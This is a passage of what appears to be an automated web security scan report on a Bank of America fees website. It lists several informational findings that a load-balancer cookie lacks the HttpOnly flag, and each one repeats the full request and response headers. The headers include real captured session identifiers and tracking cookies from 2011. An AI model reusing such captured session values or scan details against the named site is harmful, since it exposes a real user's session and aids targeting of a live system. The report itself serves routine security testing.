User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/manage-credit-card-fees/transaction-fees-and-aprs/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:30 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c1da-2a8-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 680
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:30 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:30 GMT;path=/

GIF89aD......................................................!.......,....D......0.I..8....`(.di.h..l..p<.tm.x..|....pH,....r.l:...tJ.Z...v..z...tA.....z.n....|N.....~.................................
...[SNIP]...

4.13. http://factsaboutfees.bankofamerica.com/assets/img/bg_clarity_center.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/bg_clarity_center.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:04 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/bg_clarity_center.jpg HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:04 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:54 GMT
ETag: "24c214-45e-4ab460c951580"
Accept-Ranges: bytes
Content-Length: 1118
Content-Type: image/jpeg
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:04 GMT;path=/

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

..........................................................................................................T....
...[SNIP]...

4.14. http://factsaboutfees.bankofamerica.com/assets/img/bg_clarity_left.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/bg_clarity_left.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:03 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/bg_clarity_left.jpg HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:03 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:54 GMT
ETag: "24c1c8-4c8-4ab460c951580"
Accept-Ranges: bytes
Content-Length: 1224
Content-Type: image/jpeg
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:03 GMT;path=/

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

..........................................................................................................T.:..
...[SNIP]...

4.15. http://factsaboutfees.bankofamerica.com/assets/img/bg_clarity_right.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/bg_clarity_right.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:04 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/bg_clarity_right.jpg HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:04 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c1fe-4e8-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 1256
Content-Type: image/jpeg
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:04 GMT;path=/

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

..........................................................................................................T.=..
...[SNIP]...

4.16. http://factsaboutfees.bankofamerica.com/assets/img/bg_relatedLinks.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/bg_relatedLinks.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:28 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/bg_relatedLinks.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/manage-credit-card-fees/transaction-fees-and-aprs/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:28 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c1cf-12d5-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 4821
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:28 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:28 GMT;path=/

GIF89aT.Z..Q../@...............................~.............................................................ttt.......................................fff..............................................
...[SNIP]...

4.17. http://factsaboutfees.bankofamerica.com/assets/img/bg_relatedLinksBtm.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/bg_relatedLinksBtm.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:28 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/bg_relatedLinksBtm.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/manage-credit-card-fees/transaction-fees-and-aprs/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; 